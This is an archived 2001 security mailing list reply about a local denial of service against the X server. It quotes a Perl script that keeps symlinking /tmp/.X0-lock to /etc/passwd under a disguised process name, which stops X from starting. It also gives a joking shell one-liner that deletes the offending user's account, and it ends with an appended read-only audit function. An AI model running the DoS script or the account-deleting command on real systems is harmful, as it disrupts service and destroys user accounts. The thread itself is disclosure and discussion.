Vulnerability Development mailing list archives

Re: *SERIOUS* local dos in X


From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 11 Dec 2001 10:12:48 +0300

Hello ac1d-burN,

This problem was patched a long time ago by implementing an rmuser script:

something like

#!/bin/sh

if ls -l /tmp/.X0-lock | grep '\->'
then rmuser `ls -l /tmp/.X0-lock | awk '{print ($3)}'`
fi

will resolve this problem _completely_....

;)

--Monday, December 10, 2001, 8:50:28 PM, you wrote to vuln-dev () security-focus com:

ab> greetings readers,

ab> #!/usr/bin/perl

ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING
ab> # WARNING - WARNING - WARNING - WARNING - WARNING - WARNING
ab> #
ab> # advanced lokal denial of service attack against X.
ab> #
ab> # short demonstration:
ab> # [acidburn@localhost acidburn]$ ./X-d0S.pl
ab> # ---
ab> # [root@localhost root]# X &
ab> # [1] 8639
ab> #
ab> # Fatal server error:
ab> # Server is already active for display 0
ab> # If this server is no longer running, remove /tmp/.X0-lock
ab> # and start again.
ab> ## slightly broken !!!

ab> #!/usr/bin/perl

ab> $EVIL_FILE="/tmp/.X0-lock";

ab> $0 = "pine" ; # ph00l sysadmin with stealth techniqz

ab> system("ln -s /etc/passwd $EVIL_FILE 2&>1");

ab> while(ACIDBURE.IS.ELITE) {
ab>     if (! -e $EVIL_FILE) {
ab>         system("ln -s /etc/passwd $EVIL_FILE 2&>1");
ab>     }
ab> }

ab> greets: Sp0aR and rloxley!

ab> signed,
ab> acid burn

ab> -------------------------------------------------------


-- 
~/ZARAZA
Punch the ENIACs in the face!  (Lem)
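
Added example (not part of the original message or the quoted post): a read-only check for the condition discussed in this thread, an X display lock file that is a symlink, which reports the link's owning UID and target instead of acting on the account. The function name audit_x_locks and its output format are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit X display lock files for the symlink condition
# described in this thread. It only reports; it removes nothing.
#
# Usage: audit_x_locks [DIR]     (DIR defaults to /tmp)
# Output, one line per flagged file:
#   <path> symlink uid=<n> -> <target>
#   <path> not-regular uid=<n>
# Returns 1 if anything was flagged, 0 otherwise.
audit_x_locks() {
    dir=${1:-/tmp}
    flagged=0
    for lock in "$dir"/.X*-lock; do
        # An unmatched glob stays literal; -L also catches dangling symlinks.
        [ -e "$lock" ] || [ -L "$lock" ] || continue
        # ls -ldn describes the link itself and prints the numeric owner UID.
        uid=$(ls -ldn "$lock" | awk '{print $3}')
        if [ -L "$lock" ]; then
            target=$(readlink "$lock")
            echo "$lock symlink uid=$uid -> $target"
            flagged=1
        elif [ ! -f "$lock" ]; then
            # A real lock is a regular file; anything else is unexpected.
            echo "$lock not-regular uid=$uid"
            flagged=1
        fi
    done
    return $flagged
}
```

The reported UID identifies the account that created the link, which is the same information the rmuser one-liner above extracts from column 3 of ls -l.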

